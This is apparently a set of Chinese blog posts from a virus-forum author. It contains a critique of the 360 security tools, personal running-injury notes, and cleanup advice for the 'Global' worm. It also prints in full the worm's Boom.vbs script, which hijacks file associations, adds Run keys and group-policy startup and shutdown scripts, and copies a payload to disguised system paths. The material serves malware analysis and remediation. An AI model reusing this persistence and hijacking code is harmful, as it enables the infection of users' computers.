对联式悲哀

欢迎转载，但请保留作者：MaaJiaa@Virus.Zone3.RYGH

客观的讲作为一款免费软件，360还是做得很不错的。可是由于奇虎恶心的宣传策略，一款普通的安全辅助软件俨然已经变成了像杀毒软件一样的装机必备，仿佛有了360就有了安全保障。

360系列全套软件看起来很多，可是其中你能找出属于奇虎自己的技术么？不过都是把别人的技术买过来，或者把别人免费但不知名的东西弄过来而已。当然弄过来之后经360整合，用起来还是很方便的。以下是对360系列软件的一些个人看法，欢迎拍砖。

360安全卫士本家
360安全卫士是个什么东西，仅仅是和xx上网助手、xx安全助手类似的小的安全辅助工具而已。
很多小白几百年也不晓得更新一次杀毒软件的病毒库，某天突发奇想用360扫描，哇~~扫出了这么多木马，还有这么多漏洞！360好强大阿！最近之所以很多人突然发现360安全卫士好用，是因为最近某木马下载器类型的病毒有些泛滥，该病毒有一两个主体，中毒之后会调用该主体下载其他几十上百个木马。等到你发现机器中毒的时候，通常已经木马遍地机器运行速度严重减慢了。这时候拿360扫描，显然结果就是一大堆木马，删掉之后机器速度也正常了，于是“360把毒杀干净啦”。可是病毒主体根本没解决掉，于是过段时间又死灰复燃，再360扫描，如此循环。实际上，凡是360能扫出来的木马，是个合格的杀毒软件同样也能扫出来，而且只会比它扫得更全面删得更彻底。而对于驱动级别保护的病毒，即便是专业的杀毒软件，也不一定能解决掉。
总的来说，作为免费的安全工具，360安全卫士还是很不错的，界面、易用性等等都比较好。类似的软件也有很多人推荐Windows清理助手，也是同样优秀的免费软件。
不管怎样，切记：360只是一个安全工具，不要把它当成杀毒软件来用，如果你以为系统里面装一个360安全卫士就不用其他杀毒软件和防火墙，你会死得很惨。还有，360论坛上的那些文章没有阅读价值，有些甚至会误导，这可能也和360定位的使用群体中小白比较多有关。
还有一点很重要，如果你使用的是卡巴斯基网络套装KIS，或者卡巴斯基工作站版本，以及Adobe Acrobat 9.0的专业版，请不要使用360的清理恶评插件以及清除木马功能，该功能会破坏上述软件的一些开机启动项（所以对于卡巴误杀360的事件，我对360不怎么同情）。

360安全浏览器
“沙箱”技术是从Sandboxie手上买过来的，浏览器就是世界之窗，完全没有原创技术。什么是沙箱？简单的讲就是开辟一块单独的空间，上网的时候所有代码、程序都约束在这块空间以内运行，不允许穿透这块空间去访问修改系统的其它部分，从而达到把恶意代码隔离的目的。
在正式版本出来之前，elysion@RYGH曾经对360的安全浏览器做过简单的测试，直接下载病毒本体，然后在沙箱中运行，效果还不错。但是他发现了一个大Bug：如果下载的不是可执行文件，而是压缩包，选择在沙盘中运行会调用WinRAR，然后在WinRAR中双击压缩包里面的可执行文件，就变成在沙盘外直接运行了。不知道正式版本这个bug有没有修复。
另外，沙箱也不是如360宣称的那样绝对安全，Sandboxie在拦截键盘记录测试中的表现不算特别好，如果有盗号木马运行在沙箱中，它们仍然可以发挥作用盗取在沙箱外输入的密码。（引用elysion的测试报告）
总的来说这个东西还值得一用，但是不要迷信360的宣传而放松警惕。

360 APR防火墙
关于什么是ARP攻击，可以参考本人以前写的一篇《ARP攻击扫盲贴》。
360号称的什么内核层拦截我也懒得管，我只知道当局域网内本来就存在ARP欺骗攻击的时候，360会把假的网关当成真的网关保护起来。（解决方法在此）
360很聪明，看到瑞星防火墙ARP防御导致网络负担增加，严重影响局域网内通信的前车之鉴，于是大肆宣扬自己绝对不增加网络负担，可是你不给网关发包主动防御，别人不骗你只骗网关怎么办？能“完美解决”局域网内ARP攻击的方法，只有找到攻击源让它杀毒。
其实这也不能怪360没有用，一切都归咎于ARP协议本身的漏洞太容易利用，可是360的宣传词太无耻。不论说辞多么天花乱坠，实际上这个ARP防火墙的防御效果就相当于：
1. 首先运行cmd，然后输入arp -a，把列表里面的网关ip和网关mac抄下来；
2. 然后打开记事本，输入一行字“arp -s 网关ip 网关mac”，保存为arp.bat文件；
3. 再把这个文件拖放到开始菜单的启动栏里面，over。
当然360实现了更多的功能，例如受到攻击会报警，读取数据包里面的ip信息并显示出来等等，可是真正能起到的防御效果和以上3个步骤毫无区别，不可能“完美解决局域网内ARP攻击问题”。
这个东西或许也可以用一下，但是请不要对它的效果抱有太大的希望，只能保证不因中毒机器的ARP攻击而断网（别人主动恶意攻击你不在讨论范围之列）。
P.S. 不管是什么公司出的ARP防火墙，都不能当作真正的网络防火墙来用，这点不要弄混淆。同时推荐一款国产新兴的免费网络防火墙——风云防火墙，规则项很全面，但是需要使用者对网络稍有一定了解。

360系统诊断工具
这个东西就是个废物，无非是把注册表里面的几个项导出来，然后把任务管理器里面能看到的进程名字抄下来。连每个进程里面注入了哪些线程都不能看到，更不用说扫描隐藏进程、扫描API Hook劫持等等功能了。用这个生成的扫描报告什么都做不了，纯粹浪费时间。如果真的需要发扫描报告求助杀毒，推荐使用SREng。

360时间保护器
这个东西我没用过，修改系统时间的手法就只能对卡巴斯基起效，这个也算是卡巴斯基的大漏洞吧，只要改改系统时间就可以轻易的放倒卡巴。
有需要也可以用一下，360会给你弄个驱动，相应的代价是占用一定的系统资源。

360恶意网站屏蔽器
把Hosts文件编辑写个图形界面的小程序出来，就摇身一变成了安全工具，实在令人匪夷所思...
所谓的Hosts文件在C:\WINDOWS\system32\drivers\etc目录下面，可以用记事本打开编辑。打开以后#开头的行是注释行，里面还有“127.0.0.1  localhost”这类似的内容，127.0.0.1代表ip地址，locahost代表网址。如果在下面加一行“10.0.0.0  www.baidu.com”就表示当你访问www.baidu.com时会自动跳转到10.0.0.0，而跳转到127.0.0.1则表示不访问网络。因此，把那些恶意网站的网址全都添加到hosts文件里面，然后指向127.0.0.1，就可以实现屏蔽恶意站点的功能。
360推出的这个工具不能算安全工具，顶多是个记事本加强版而已。另外，hosts列表屏蔽恶意网站，对使用代理上网的人不起效。

360文件粉碎工具
这个也是废物，虽然360号称它可以粉碎“一切顽固文件”，可是拿它删正在运行中的病毒根本删不掉。
免费的强制删除工具有很多，像Unlocker、PowerRmv、XDelBox等等，这其中我尤其推荐使用XDelBox，不止因为它能删除驱动级文件，而且它可以在系统外部进行清除，这样病毒的任何保护机制都无能为力了。（光华Virus版版大snowflurry语）

360网吧还原系统保护器
没用过不清楚。在此借地膜拜一下某大牛，把他的Ring0级别绕过还原保护的代码公布到了网上，于是天下大乱...

360安全卫士修复工具
没用过，想来也是废物一个，连CRC效验检查360主程序有没有被修改的功能都不具备。
中了病毒就应该立即在安全模式下用杀毒软件全盘扫描，找360有什么用？

360即将推出的免费杀毒软件
已经确定是和BitDefender总部直接合作的，不管是不是把BitDefender的免费激活码拿过来重新发，也不管最终推出的免费版本到底能实现BitDefender的多少功能，至少可以给我们多提供一种免费的选择。BitDefender也算一款很不错的杀毒软件，比较汗的是，它曾经被评为性价比第一，于是被某些英文小白当成“世界第一”的杀毒软件到处宣传。(－ －;;;)

强度和距离都太腐败，不计入总里程...

脚上那块骨头没有长大的趋势，但是也没见消多少
20来分钟的草坪，大约只有3km，当作积极恢复吧...
但愿心肺功能不至于继续退化，或者至少能退化得慢一点

真羡慕那些穿高跟鞋还能悠哉游哉的逛街的mm
今天出门稍微多走了点路，回来腿又不行了
在草坪上绕了快10分钟才舒服点
为什么刷个40圈一点问题都没有，逛街走路我就这么废..>_<..

右脚不知道什么时候肿起一块骨头，
摸上去几乎不疼，平时走路也没有什么异样的感觉...



Running版上的前辈们有好几个也出现过这种状况，
xiaofish说是腱鞘炎，劳损所致。不影响正常生活，过段时间就好了...
果然不该让我可怜的扁平足踩拖鞋逛街走路么~~~
刚刚要开始有起色的训练又得停一个星期了..叹息——

以下为Boom.vbs的全部内容，
稍微懂点英语和注册表的人应该都知道它干了些什么...
P.S. 我这算不算在自己的blog里灌水涨文章数？

dim fs,rg
set fs = createobject("scripting.filesystemobject")
set rg = createobject("wscript.shell")
on error resume next
rg.regwrite "HKCR\.vbs\", "VBSFile"
rg.regwrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE", " C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.regwrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
rg.regwrite "HKCR\MSCFile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKCR\regfile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:\WINDOWS\system\KEYBOARD.exe"
rg.regwrite "HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\", "C:\WINDOWS\Fonts\Fonts.exe"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT#\DisplayName","Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT#\FileSysPath",""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT#\GPO-ID","LocalGPO"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT#\GPOName","Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT#\SOM-ID","Local"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT##CONTENT#\Parameters",""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT##CONTENT#\Script","C:\WINDOWS\Cursors\Boom.vbs"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT#\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT#\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT#\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT#\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT#\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT##CONTENT#\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT##CONTENT#\Script", "C:\WINDOWS\Cursors\Boom.vbs"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT#\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT#\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT#\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT#\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT#\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT##CONTENT#\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT##CONTENT#\Script", "C:\WINDOWS\Cursors\Boom.vbs"

If Not fs.fileexists("C:\WINDOWS\Fonts\Fonts.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\Fonts\Fonts.exe")
If Not fs.fileexists("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com")
If Not fs.fileexists("C:\WINDOWS\pchealth\Global.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\Global.exe")
If Not fs.fileexists("C:\WINDOWS\system\KEYBOARD.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system\KEYBOARD.exe")
If Not fs.fileexists("C:\WINDOWS\system32\dllcache\Default.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system32\dllcache\Default.exe")
If Not fs.fileexists("C:\windows\system32\drivers\drivers.cab.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\system32\drivers\drivers.cab.exe ")
If Not fs.fileexists("C:\windows\media\rndll32.pif ") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\media\rndll32.pif")
If Not fs.fileexists("C:\windows\fonts\tskmgr.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\fonts\tskmgr.exe")

欢迎转载，但请保留 作者：MaaJiaa@Virus.Zone3.RYGH

首先恭喜该病毒上周终于荣登卡巴斯基每周病毒报告的首位
卡巴对其命名为Worm.Win32.Autorun.eed
既然卡巴能查它了，清除病毒的工作大概可以简单很多，安全模式下全盘扫描是王道！
手动杀毒方法见《新·打印店Global病毒解决方案》
一些早期发现的病毒后遗症修复脚本也在上面这个链接里有说明。

以下这些是前几天帮同学杀毒时发现的某版本MS-DOS.com(大小为220K)后遗症，
其中有些后遗症其他版本也有而且相当恶心，例如修改exe文件...
我想说，要是你中毒已经很久，估计硬盘里能改的exe都已经被病毒改了一遍
最省事的办法还是重装吧，格C盘重装，其他盘里面的那些exe都别要了。

1. 病毒会修改运行过的exe文件
更新杀毒软件病毒库，安全模式下全盘扫描，
如果能查出exe被感染那最好，选择“清除病毒”而不是“删除文件”试试
查不出的话，对于该病毒会修改exe文件的问题，除了重装，
我目前也不知道还有没有别的办法解决...
或许可以用filemon监视到底是哪个进程在修改exe，
或许是这些exe互相改来改去...

2. 一些漏掉的映像劫持项
运行SREng（下载地址及使用方法见官方页面），找到 启动项目 -- 注册表项
里面如果还有其他形如<IFEO[xxx.exe]>的项（红字），把那些删掉
这个是某些版本的Global会遗留的问题，映像劫持office系列，photoshop等等软件，
造成Word/PowerPoint/Photoshop等程序无法使用。

3. 控制面板被全面禁用
可以运行组策略编辑器gpedit.msc，
找到 用户配置 -- 管理模板 -- 控制面板 ，在这里面随便改一改，
例如把每一项先启用组策略然后再改回未配置...

Home版XP没有组策略编辑器，需要手动修改注册表
病毒到底做了哪些修改我不清楚，
只能照着MS_Windows版精华区x-13-19的帖子改...
MS_Windows精华区的这篇贴子有详细说明(其中有几项遗漏)，
但是其中 HKEY_USER\用户名\ 可以换成 HKEY_CURRENT_USER\
P.S. 该链接只能每天23点以前查看，大家也可以Google 注册表+控制面板...

我对照了我自己的系统，发现默认情况下
system主键下没有东西，Network这个主键不存在
所以给一个一步到位的方法：
运行cmd，然后输入：
reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Policies backup.reg
这一步是备份，防止误删，
成功后会在 C:\Documents and Settings\当前用户名\ 这个目录下生成backup.reg的文件，
需要恢复时双击导入注册表即可。接下来：
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /va
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network
P.S. 关于reg命令的详细情况请自行调用帮助参数reg /?

4. 其他不明后遗症
例如压缩包不能打开，photoshop被禁用，都是提示“管理员限制”
不知道是病毒改了什么地方，我目前还没有解决...